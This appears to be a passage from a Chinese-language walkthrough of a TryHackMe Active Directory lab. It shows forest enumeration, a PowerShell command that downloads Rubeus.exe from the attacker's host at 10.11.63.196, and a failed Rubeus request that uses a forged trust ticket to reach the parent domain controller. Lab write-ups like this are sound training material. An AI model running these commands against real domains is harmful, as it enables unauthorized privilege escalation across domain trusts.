Domains               : {ENTERPRISE.THM, LAB.ENTERPRISE.THM}
GlobalCatalogs        : {ENTERPRISE-DC.ENTERPRISE.THM, LAB-DC.LAB.ENTERPRISE.THM}
ApplicationPartitions : {DC=ForestDnsZones,DC=ENTERPRISE,DC=THM, DC=DomainDnsZones,DC=ENTERPRISE,DC=THM, DC=DomainDnsZones,DC=LAB,DC=ENTERPRISE,DC=THM}
ForestModeLevel       : 7
ForestMode            : Unknown
RootDomain            : ENTERPRISE.THM
Schema                : CN=Schema,CN=Configuration,DC=ENTERPRISE,DC=THM
SchemaRoleOwner       : ENTERPRISE-DC.ENTERPRISE.THM
NamingRoleOwner       : ENTERPRISE-DC.ENTERPRISE.THM

能够看到父域的 DC 服务器是:ENTERPRISE-DC.ENTERPRISE.THM

传 Rubeus.exe 到本地

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.63.196/Rubeus.exe','C:\users\bitbucket\Desktop\Rubeus.exe')"

应用 Rubeus 尝试生成一个 tgs

PS C:\users\bitbucket\Desktop> .\Rubeus.exe asktgs /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi /service:cifs/ENTERPRISE-DC.ENTERPRISE.THM /dc:ENTERPRISE-DC.ENTERPRISE.THM /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Ask TGS

[X] Error resolving hostname 'ENTERPRISE-DC.ENTERPRISE.THM' to an IP address: No such host is known

然而报错了,说找不到这个主机名

用 powerview 查找也没找到

PS C:\users\bitbucket\Desktop> Get-NetComputer -Domain LAB.ENTERPRISE.THM
LAB-DC.LAB.ENTERPRISE.THM
PS C:\users\bitbucket\Desktop> Get-NetComputer -Domain ENTERPRISE.THM
WARNING: Error: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server."

这个就很奇怪。。

退出移动版